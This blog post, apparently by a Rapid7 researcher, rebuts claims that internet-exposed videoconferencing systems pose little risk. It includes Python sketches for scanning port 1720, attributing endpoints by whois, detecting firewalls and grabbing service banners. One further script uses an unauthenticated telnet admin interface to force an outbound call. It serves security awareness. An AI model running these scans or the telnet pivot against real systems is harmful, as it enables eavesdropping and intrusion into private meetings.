Mythical Videoconferencing Hackers

Blog Post created by hdmoore on Jan 25, 2012

Open and frank debate is one of the great things about the security community, and the recent press about our H.323 research has set off a firestorm in some circles. In one extensive post, David Maldow of Human Productivity Lab downplays the risk to video conferencing systems and makes a few claims about their security that were hard to ignore. David's statements appear in "quotes" and our responses follow in bold:

Introduction

"I've read good things about Rapid7 and always support efforts for security, but in fairness it should be noted that projecting an atmosphere of security risk in videoconferencing is clearly in their interest."

Unfortunately, everyone has a bias - if we did not care about proactive security testing, this research would never have occurred. Rapid7 takes an empirical approach to security research, focusing on how systems are actually deployed in the real world. For this project, we spent a lot of time quantifying the scan data and speaking with industry experts in the video conferencing space (a group we do not count ourselves among). Rapid7 focuses on providing products, tools, and information about security risks that allow our customers and open source users to make informed decisions. Calling attention to an issue that has historically been ignored, and providing the tools to test it, is what we do.

We often find situations where large numbers of systems are deployed in surprisingly insecure ways, where everyone, including us, would have expected that "no one would do it this way". This mismatch between expectations and reality is a major source of real-world security problems. For example, I never would have expected that a widely deployed embedded operating system like VxWorks would ship with the debugger attached and open to connections by default - and any industry expert you asked would similarly say "no sane person would deploy it that way". Many of David's comments are along the same lines of "no one would do it that way". The facts, unfortunately, again prove otherwise.

Videoconferencing Hackers

"The article's title claims that the boardroom will be opened up to "Hackers." However, from the rest of the article it was clear that there was no real hacking involved. Videoconferencing signals use AES encryption. This isn't a new or rare development. AES has been standard on almost all major endpoints (at all price ranges) for a long time. The use of AES means that even if videoconferencing data signals are intercepted as they traverse the internet, the encryption would have to be hacked before anyone could watch the video or listen to the audio. No one is suggesting that this type of hacking is occurring. Rather than hacking into the boardrooms, Rapid7 was simply calling them. These systems apparently answered some of their calls, as they were designed to do."

Encryption rarely has anything to do with security, and hacking doesn't need to be high-tech to be worth defending against - only effective. The issue with auto-answer is one piece of a larger problem with video conferencing deployments, but it was the issue the NYT article focused on, due to the ease of exploitation and the visible result. In our January 24th webcast, we expanded the scope to cover pivoting through administrative interfaces, exploiting software vulnerabilities in LifeSize equipment, and the lack of security controls in many video conferencing systems. Given Polycom's stance of enabling auto-answer by default and the supporting data from our scans, even the auto-answer issue was worth addressing on its own.

"Rapid7 did create a program to scan the internet for videoconferencing systems. From this they were able to get a list of IP addresses, which are like phone numbers for VC systems. However, they had no idea where these systems were located and who they belonged to. It was a phone book with no names, only numbers. Not a great tool for an effective targeted hacking attack"

The details of the tool were not abundantly clear in the NYT article (the length wouldn't allow for it), but the scanning module we used was developed in-house and actually initiates an H.323 call to each scanned system. This module is open source and you can find it on GitHub. The protocol handshake returns a number of useful bits of data, including the Vendor ID, Version ID, Product ID, and DisplayName.
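
To make the discovery step concrete, here is a minimal Python sketch that sweeps a network range for hosts listening on TCP port 1720, the standard H.225 call-signaling port. It only confirms that something answers on that port - it does not perform the H.323 handshake or extract the Vendor ID, Version ID, Product ID, and DisplayName fields the way the actual scanner module does - and the network range shown is a placeholder.

#!/usr/bin/env python
# Minimal discovery sketch: find hosts accepting TCP connections on port 1720
# (H.225.0 call signaling). This does NOT speak H.323 or parse VendorID,
# ProductID, or DisplayName; it only illustrates the sweep concept.
import ipaddress
import socket

NETWORK = "192.0.2.0/24"   # placeholder range; substitute the range to survey
PORT    = 1720             # standard H.225.0 call-signaling port
TIMEOUT = 2.0              # seconds per connection attempt

def is_listening(host, port, timeout=TIMEOUT):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except (socket.timeout, OSError):
        return False

if __name__ == "__main__":
    for addr in ipaddress.ip_network(NETWORK).hosts():
        if is_listening(str(addr), PORT):
            print("Possible H.323 endpoint: %s:%d" % (addr, PORT))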

The DisplayName usually describes either the location or purpose of a specific endpoint. Approximately half of the results from the scan included the DisplayName element. I have changed some of the names to prevent obvious identification, but you can see that between the product information, the DisplayName, and the attributes of the IP address (DNS and Whois), identifying the owner of a particular endpoint is trivial.

         IP: AAA.BBB.CCC.DDD:1720 Protocol: 5

   VendorID: 0xb500a11a VersionID: 4.5.6.2 ProductID: LifeSize Express

DisplayName: 36th Floor Board Room

        DNS: AAAAAA.dsl.chcgil.sbcglobal.net

      Whois: <CENSORED> ADVISORS-013223144143 ( IP range )

In this example, we identified the physical location, company name, ISP, and enough information about the product itself to know that the LifeSize exploit module included with the Metasploit products could be used to gain remote access to the system (Linux) shell.
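
To illustrate how trivial that attribution step is, the following sketch performs a reverse DNS lookup with Python's standard library and shells out to a standard whois command-line client (assumed to be installed) to pull the ownership record for an address. The address shown is a placeholder.

#!/usr/bin/env python
# Sketch: attribute an endpoint by combining reverse DNS with whois output.
# Assumes a standard `whois` client is installed and on the PATH.
import socket
import subprocess

ADDRESS = "192.0.2.10"   # placeholder; substitute an address from the scan output

def reverse_dns(address):
    """Return the PTR name for an address, or None if no record exists."""
    try:
        return socket.gethostbyaddr(address)[0]
    except (socket.herror, socket.gaierror):
        return None

def whois_lookup(address):
    """Return raw whois output for an address (empty string on failure)."""
    try:
        result = subprocess.run(["whois", address], capture_output=True,
                                text=True, timeout=30)
        return result.stdout
    except (OSError, subprocess.TimeoutExpired):
        return ""

if __name__ == "__main__":
    print("DNS:  ", reverse_dns(ADDRESS))
    # Only show the whois lines most likely to name the owning organization.
    for line in whois_lookup(ADDRESS).splitlines():
        if line.lower().startswith(("orgname", "org-name", "netname", "descr")):
            print("Whois:", line.strip())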

If you look at just the DisplayNames, these are often more than enough to precisely identify the organization and location. These names include things like "Something Media", "BigCorp Moscow Polycom 2", and in some cases "<County> Courthouse". In the interest of not subjecting any specific entity to embarrassment or directed attacks, we have avoided publishing any detailed lists of results.

"With this list in hand, they started random dialing and peeked around some empty rooms. It should be noted that this list only included systems that were not deployed behind firewalls. "

To determine whether these systems were behind a firewall, we used the Nmap scanner to look for systems that had a large number of filtered ports. In most cases, these devices were deployed outside of the firewall, with the administrative interfaces exposed to the world. This may not be the recommended mode, but it is certainly prevalent in the wild. Even in cases where firewalls were in place, the H.323/1720 listener was still forwarded through, allowing incoming calls. This is one of the problems with H.323 as a protocol - it is difficult to use through NAT, requires a large number of ports, and any point-to-point call requires the recipient to expose their system to the internet at large, relying on source IP ACLs or other product-specific controls to limit access.
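
The heuristic is easy to reproduce. A probe that receives no response at all ("filtered") is usually being dropped by a firewall, while an immediate connection refusal ("closed") suggests the host is directly reachable. The sketch below approximates this with plain TCP connect attempts against a placeholder host and a small placeholder port list; the Nmap scans we ran applied the same idea across a much larger set of ports.

#!/usr/bin/env python
# Sketch of the firewall heuristic: a timeout ("filtered") usually means a
# firewall silently dropped the probe, while "connection refused" ("closed")
# means the host answered directly. Many filtered ports imply a firewall.
import socket

TARGET  = "192.0.2.10"                  # placeholder address
PORTS   = [21, 22, 23, 80, 443, 1720]   # placeholder sample of ports
TIMEOUT = 2.0

def probe(host, port, timeout=TIMEOUT):
    """Classify a TCP port as open, closed, or filtered."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"               # no answer: probe likely dropped
    except ConnectionRefusedError:
        return "closed"                 # RST received: reachable, not listening
    except OSError:
        return "filtered"
    finally:
        sock.close()

if __name__ == "__main__":
    states = {port: probe(TARGET, port) for port in PORTS}
    for port, state in sorted(states.items()):
        print("%5d/tcp  %s" % (port, state))
    filtered = sum(1 for s in states.values() if s == "filtered")
    print("%d of %d ports filtered (high counts suggest a firewall)"
          % (filtered, len(PORTS)))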

By and large, organizations are ignoring the hassle and dumping the system online outside of the firewall or through a 1-to-1 NAT configuration. An industry expert pointed out one reason so many endpoints are configured to auto-answer calls from the internet: many MCUs are used in an outbound dial mode to start meetings, and auto-answer is the most convenient way for the participants to join the call.

"Any environment with real security requirements will have their VC systems behind firewalls."

The most surprising thing about the research was how many well-heeled and quite sensitive organizations were doing little or nothing to restrict access to their VC equipment. Anyone who spends the time locking down their VC systems can do an adequate job of protecting against external attacks - it's simply that many do not, and the overall awareness is not there today.

"Real hackers are scary. If someone does find a way to isolate VC traffic over the internet and hack encrypted VC signals from specific locations, I will be the first to raise the alarm. But I simply don't see a massive threat in the fact that it is possible to get lucky and randomly dial into an anonymous empty meeting room."

Real hackers are opportunists in every sense of the word. Encryption is not equivalent to authentication, and often a silly software bug (such as the command execution flaw in the LifeSize web service) is all that's needed to tear down any other defenses. The H.323 protocol provides enough information that an attacker can quickly map a network range associated with their target, identify any VC equipment, and leverage weak default settings (auto-answer), default passwords, and software vulnerabilities to gain access to the audio/video stream, if not the internal network itself.

Flaws in Videoconferencing Systems

"In the next section I will explain why it is not easy to stealthily dial into a meeting room while in use."

Without debating each of David's points, we did prove that most VC equipment provided little or no warning when an attacker dialed into the system. In most cases, the television set is off unless a call is expected. If the television is off, there is little indication that a call is in progress. The reason for this is two-fold:

First - the indicator that turns on when a call is in progress is usually on the base unit, not the camera, and the base units are often stashed behind a cabinet, near the floor, or otherwise out of sight.

Second - newer cameras (specifically, the Polycom HDX series) are extremely quiet while being panned or zoomed and the only indication they provide is the direction they are facing. We conducted a "blind" test where the conference room VC unit was accessed during a Rapid7 general staff meeting. Twenty minutes into the meeting, nobody had noticed the camera swinging from the rest position to pointing at a participant's laptop screen, zoomed in to capture his email and keystrokes.

"I think it is acceptable for low security rooms to have glass walls and video systems set to auto answer."

The expected security of a room depends on the company and the specific meeting being conducted within it. David mentioned that in some conference rooms, the walls were glass and there really was no visual protection for documents left on the table. However, it is very common for sensitive information (term sheets, passwords, personnel documents, etc.) to be left out in the open.

A much more significant risk is the audio pickup - in many cases, the only security on the VC system was literally a post-it note or other visual obstruction in front of the camera lens, which has no effect on the audio pickup. Testing similar equipment in our lab, we found that conversations could be clearly heard down the hall from where the VC unit was installed. David does make a fair point that incoming calls are commonly configured to start off muted, but this is not always the case.

"If a meeting room requires security, you are as unlikely to find an unprotected videoconferencing system as you are to find an unprotected desktop computer."

Folks who spend a lot of time conducting security assessments can testify that unprotected desktops are not unheard of on external subnets. It's a poor security policy, just like leaving a VC unit exposed to the internet, but it still happens, and even large organizations that should know better make this mistake. The issue with VC systems may be more dangerous, as these systems sit directly on the internet and, by their nature, in very sensitive locations.

"IT admins for sensitive environments are generally knowledgeable about firewalls and internet security. They are not likely to allow any IP devices to exist outside the firewall under their watch"

This is a really interesting point. IT admins often have little knowledge of, or experience with, video conferencing security. An informal survey of enterprise customers using VC systems indicated that many units were set to auto-answer, that IT was not managing security patches, and that the units were often left exposed to the internet, sometimes with default passwords. All of these responses reinforced the results of the scan we performed.

"Rapid7 suggests a significant number of systems in otherwise secure environments are being deployed outside the firewall. This was disputed in the article by Ira M. Weinstein, senior analyst at Wainhouse Research, who stated that, "The companies that really have to worry about breaches -- the Department of Defense, banks -- put their systems behind the firewall." Mr. Weinstein's words carry some weight, considering his years covering this industry."

This was a point of debate. With all due respect to Mr. Weinstein's experience, he did not scan the internet to actually validate his assumptions. Even systems with some form of firewall in place were not afforded much protection, since the devices were still configured to automatically accept incoming calls.

"Unlike a small company with one system in their one meeting room, Goldman Sachs likely is using a managed service provider to ensure that all of their systems are properly, and securely, provisioned."

We do not want to mention specific examples, but "Goldman Sachs" stood out because, even though we didn't identify any of their systems in the internet survey, an organization they likely work with had access to a private link to their system. Since this organization exposed the administrative interface of its VC system without requiring any form of authentication, the device could be used to bridge a call between an internet-facing attacker and a system on a private link such as the one labeled "Goldman Sachs". We have no proof that this system actually belonged to Goldman Sachs or that the call would have worked, but we did simulate the attack using similar equipment in the lab.

Managed service providers are another area where this research took an unexpected turn. These providers typically use leased lines, VPNs, or other forms of private connectivity to bridge video services between sites. We found that many of the internet-exposed VC units also had access to the managed service provider network and internal resources. This was verified by looking at the unprotected web and telnet interfaces of units found with this configuration (again, we didn't guess passwords or attempt to bypass any existing security). Depending on how these service provider networks are configured, a single exposed customer could provide a foothold into the managed services network.

The same type of proxy attack works between IP and ISDN endpoints. An attacker accessing the administrative interface of an endpoint through its IP address can force the system to make an outbound call to an ISDN line. If the target of this proxy attack allows incoming calls from this device (often the case for systems that are frequently dialed from the system address book), the call will be accepted, and the attacker now has at least snapshot access, if not much more, to the ISDN-connected target.
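
A rough sketch of what that pivot looks like in practice follows: connect to an endpoint's exposed, unauthenticated telnet administrative interface and ask it to dial out. The address, port, and especially the command string are placeholders - real dial syntax varies by vendor and firmware - so this illustrates the shape of the attack rather than a working command set for any specific product.

#!/usr/bin/env python
# Sketch of the proxy-attack shape: drive an outbound call through an exposed,
# unauthenticated telnet administrative interface. The DIAL_COMMAND string is a
# placeholder; actual command syntax differs by vendor and firmware version.
import socket

ENDPOINT     = "192.0.2.10"                      # placeholder: exposed VC endpoint
TELNET_PORT  = 23                                # telnet administrative interface
DIAL_COMMAND = b"dial manual 5551234 isdn\r\n"   # placeholder command syntax

def send_command(host, port, command, timeout=10.0):
    """Connect, read any banner/prompt, send one command, return both responses."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        try:
            banner = sock.recv(4096)             # unauthenticated units often print a prompt
        except socket.timeout:
            banner = b""
        sock.sendall(command)
        try:
            reply = sock.recv(4096)
        except socket.timeout:
            reply = b""
    return banner, reply

if __name__ == "__main__":
    banner, reply = send_command(ENDPOINT, TELNET_PORT, DIAL_COMMAND)
    print(banner.decode(errors="replace"))
    print(reply.decode(errors="replace"))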

"The NYT seems to be simply unaware of the fact that the videoconferencing industry has had skin in the security game since its inception."

This comment refers to a statement about the lack of security built into video conferencing systems. I strongly disagree that security was a foremost concern for devices made between 3 and 7 years ago. The web and telnet services of the Polycom ViewStation systems from 2005 require no authentication at all. The vendors may have supported encryption since the beginning of IP video conferencing, but encryption only protects the data in transit; it does not protect the endpoint itself from a directed attack.

Video conferencing equipment is actually pretty far behind the curve of other network devices when it comes to resistance to attack. Even some consumer printers ship with a more secure administrative interface than what many vendors in the video conferencing space provide today.

"In addition, the systems are often installed by experts with security as a priority. In a blog on this subject, IMCCA Director David Danto describes such an installation."

This varies widely by the organization, their awareness of security issues, and their choice of installer. As a generality, this doesn't appear to be true based on the results of our research. We do not disagree that a trained, security-conscious video conferencing expert can deliver a secure solution.

Semantics Aside - Is There A Security Risk?

"How easy is it to use a boardroom videoconferencing system to spy on a meeting? The answer is that it may be possible, but it wouldn't be very easy...Having spent countless hours testing videoconferencing systems and videonetwork infrastructure, with up to 18 videoconferencing systems set to auto answer at one time, I can assure you that it is not a silent process."

In our in-house testing of Polycom ViewStation and HDX units, as well as an old D-Link, the results were mixed. We found that many of the high-end systems did not provide any easily visible notification that a call had been answered. The D-Link, on the other hand, got so annoying that we actually disassembled it and yanked out the speaker to continue the testing process.

"In addition, videoconferencing systems tend to be connected to rather large monitors. When called, the monitors will often "wake up" and display the system's logo if there is no incoming video."

Many organizations simply turn off the monitors/televisions when the device is not in use. The camera swing, as mentioned in a previous paragraph, is quiet with newer equipment and fairly hard to notice, especially in a busy meeting. Keep in mind that an attacker can use a previously acquired screenshot or a blank screen as the video source for what is displayed on the monitor.

"Videoconferencing systems weren't made with stealthy activation as a goal. They are communications devices, and they were very specifically designed to do a good job of alerting users to incoming calls."

Systems that expose the administrative interface provide two options for bypassing an incoming call alert. The first is simply to turn off the ringer, preventing any audible result from the unit itself. The second is to initiate an outbound call from the unit back to the attacker, which in some cases avoids the standard notifications. Either way, if the system is configured to make a lot of noise and the administrative interface is protected, an incoming call is going to be noticeable most of the time.

"(12 IFs truncated for brevity)... With that many "ifs" I think this may not be the top security concern for today's videoconferencing users. At this point VC spying is starting to look like Mission Impossible."

Regardless, it works, and if the VC monitor is not turned on (common, as stated above), there is usually little to indicate that a call is active. Before making any claim, we did try to replicate scenarios seen "in the wild" within our lab and determine what the configuration must have been for the result to match. Keep in mind that most high-end room cameras can be controlled remotely, and an attacker can often point the camera back at the monitor to determine whether it is indeed on.

"But, if you are leaving sensitive documents lying around meeting rooms, then videoconferencing is the least of your security concerns."


This generalizes physical security to a degree that is not realistic. For firms that are small and manage sensitive or valuable information, it is fairly common for documents to be left in plain view within the office. Examples include law firms, small investment banking shops, and medical offices. At the other extreme, large organizations with extremely rigid physical security may reasonably consider documents left sitting around a secured area to be safe. It would be unfair to classify either practice as insecure if it weren't for the video conferencing unit sitting within zoom distance.

 
Securing Your Video Environment

David goes on to mention some basic security tips for video conferencing equipment. To this list, we would like to add keeping up to date on vendor patches, especially those that are security related, and requiring passcodes for access to both meeting rooms and endpoints. Polycom has a hardening guide that goes into more detail.

There is one conclusion that we still adamantly disagree with:

"Auto Answer - I have no problem with leaving auto answer enabled. However, most systems have an option to answer with audio muted. This is how I set up my systems. If I do get an unexpected call in the middle of a private conversation, the caller will not hear anything. If the NYT article made your co-workers nervous you can just turn off auto answer until everyone relaxes, but auto answer with audio muted is a perfectly acceptable secure setting."

David suggests that, even with all of the known risks, auto-answer should continue to be the standard. Fortunately, nearly every mainstream vendor, with the exception of Polycom, sees this differently. We still strongly recommend disabling auto-answer - the extra two seconds it takes to press the answer button on the remote provides the second most important security measure available (the first being adequate protection of the administrative interface, which can be used to turn auto-answer back on).

Conclusion

"Even if a system is deployed outside of a firewall, it still isn't at serious risk of being hacked. It is at risk of accepting calls (which is what it was designed to do). A few common sense precautions can eliminate the risk of your system being in a call without you knowing about it."

This statement is absolutely untrue and may put users who follow this advice at risk. The H.323 video stream is only one of the services exposed by video conferencing systems; other services, such as telnet, web, FTP, and SNMP, all expose the device to intrusion through weak credentials or exploits written specifically for that device. There is no justifiable reason to place a video conferencing system outside of the firewall if it can be avoided, and auto-answer should be disabled to prevent unexpected access to video or audio information.
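
To see what an internet-facing unit exposes besides the call listener, a quick check like the sketch below connects to a few common management ports and grabs whatever banner the service presents. SNMP is omitted because it runs over UDP, HTTPS is omitted to keep the example simple, and the target address is a placeholder.

#!/usr/bin/env python
# Sketch: check which management services a unit exposes and grab a short
# banner from each. SNMP (161/udp) and HTTPS are intentionally omitted here.
import socket

TARGET   = "192.0.2.10"                       # placeholder address
SERVICES = {21: "ftp", 23: "telnet", 80: "http"}
TIMEOUT  = 3.0

def grab_banner(host, port, timeout=TIMEOUT):
    """Return the first line a service sends (issuing an HTTP HEAD for port 80)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        if port == 80:
            sock.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        try:
            data = sock.recv(256).decode(errors="replace")
        except socket.timeout:
            data = ""
    return data.splitlines()[0] if data else ""

if __name__ == "__main__":
    for port, name in sorted(SERVICES.items()):
        try:
            print("%-6s (%d/tcp) exposed: %s" % (name, port, grab_banner(TARGET, port)))
        except OSError:
            print("%-6s (%d/tcp) not reachable" % (name, port))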

"If the technology is secure enough for the Pentagon, it is secure enough for your boardroom."

The Pentagon follows vendor-specific hardening procedures to make its systems far more secure, and almost certainly does not deploy them outside the firewall. Many videoconferencing vendors also sell Federal-specific versions with hardware and software modifications that enhance security. This statement is about the same as saying "the Pentagon uses computers, so if they're safe enough for them, they're safe enough for you".

Software vulnerabilities are rampant (Metasploit alone exploits close to 750 of them, while Nexpose has close to 60,000 checks for known defects). Hardware appliances and network devices are even more problematic, as they tend to be difficult to update and run proprietary software interfaces that are often riddled with low-hanging security flaws. Who uses a piece of equipment is never a good test of how secure it is. Some of the most insecure equipment is still FIPS-140 certified.

Closing

We would like to thank David for summarizing his concerns with how the NYT article positioned videoconferencing security. At the end of the day, we stick by our position that videoconferencing systems are often deployed in an insecure manner and that the risk of unauthorized access is not something many IT administrators or company executives are aware of today. We view the issue through the lens of vulnerability management, which is quite different from that of an industry expert. Please leave a comment or open a discussion if you have any questions or would like further elaboration on a particular area.
